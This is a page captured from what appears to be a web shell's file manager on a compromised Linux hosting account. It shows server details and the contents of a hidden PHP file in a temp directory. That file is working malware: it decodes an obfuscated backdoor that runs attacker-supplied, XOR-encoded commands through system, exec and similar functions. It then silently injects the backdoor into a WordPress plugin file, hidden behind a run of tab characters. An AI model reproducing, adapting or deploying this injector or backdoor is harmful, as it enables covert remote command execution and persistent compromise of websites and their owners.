HEX
Server: Apache
System: Linux gains.arrowcloudlinux.com 4.18.0-553.69.1.lve.el8.x86_64 #1 SMP Wed Aug 13 19:53:59 UTC 2025 x86_64
User: mbkashyap (2642)
PHP: 8.1.33
Disabled: allow_url_include, show_source, symlink, system, passthru, exec, popen, pclose, proc_open, proc_terminate,proc_get_status, proc_close, proc_nice, allow_url_fopen, shell-exec, shell_exec, fpassthru, base64_encodem, escapeshellcmd, escapeshellarg, crack_check,crack_closedict, crack_getlastmessage, crack_opendict, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, dl, escap, phpinfo
$ pwd: /home/mbkashyap/.cagefs/tmp/
Upload Files
File: /home/mbkashyap/.cagefs/tmp/.ibase_pconnection
<?php  $path = '/home/mbkashyap/domains/mbkashyap.com/private_html/wp-content/plugins/one-click-demo-import/views/plugin-page.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24module_controller1%20%3D%20%22syst%5Cx65m%22%3B%20%24module_controller2%20%3D%20%22s%5Cx68e%5Cx6C%5Cx6C%5Cx5Fexe%5Cx63%22%3B%20%24module_controller3%20%3D%20%22ex%5Cx65c%22%3B%20%24dataflow_engine%20%3D%20%22he%5Cx782%5Cx62i%5Cx6E%22%3B%20%24module_controller7%20%3D%20%22pclo%5Cx73e%22%3B%20%24module_controller6%20%3D%20%22str%5Cx65%5Cx61%5Cx6D_g%5Cx65%5Cx74%5Cx5Fc%5Cx6Fnt%5Cx65n%5Cx74%5Cx73%22%3B%20%24module_controller5%20%3D%20%22%5Cx70o%5Cx70en%22%3B%20%24module_controller4%20%3D%20%22p%5Cx61ssthr%5Cx75%22%3B%20if%20%28isset%28%24_POST%5B%22%5Cx63%5Cx6Fmp%22%5D%29%29%20%7B%20function%20service_registry%28%20%24flag%2C%20%24obj%29%7B%20%24item%20%3D%27%27%3B%20foreach%28str_split%28%24flag%29%20as%20%24char%29%7B%20%24item.%3Dchr%28ord%28%24char%29%5E%24obj%29%3B%20%7D%20return%20%24item%3B%20%7D%20%24comp%20%3D%20%24dataflow_engine%28%24_POST%5B%22%5Cx63%5Cx6Fmp%22%5D%29%3B%20%24comp%20%3D%20service_registry%28%24comp%2C%2056%29%3B%20if%20%28function_exists%28%24module_controller1%29%29%20%7B%20%24module_controller1%28%24comp%29%3B%20%7D%20elseif%20%28function_exists%28%24module_controller2%29%29%20%7B%20print%20%24module_controller2%28%24comp%29%3B%20%7D%20elseif%20%28function_exists%28%24module_controller3%29%29%20%7B%20%24module_controller3%28%24comp%2C%20%24token_flag%29%3B%20print%20join%28%22%5Cn%22%2C%20%24token_flag%29%3B%20%7D%20elseif%20%28function_exists%28%24module_controller4%29%29%20%7B%20%24module_controller4%28%24comp%29%3B%20%7D%20elseif%20%28function_exists%28%24module_controller5%29%20%26%26%20function_exists%28%24module_controller6%29%20%26%26%20function_exists%28%24module_controller7%29%29%20%7B%20%24obj_item%20%3D%20%24module_controller5%28%24comp%2C%20%27r%27%29%3B%20if%20%28%24obj_item%29%20%7B%20%24component_property_set%20%3D%20%24module_controller6%28%24obj_item%29%3B%20%24module_controller7%28%24obj_item%29%3B%20print%20%24component_property_set%3B%20%7D%20%7D%20exit%3B%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');
@ Telegram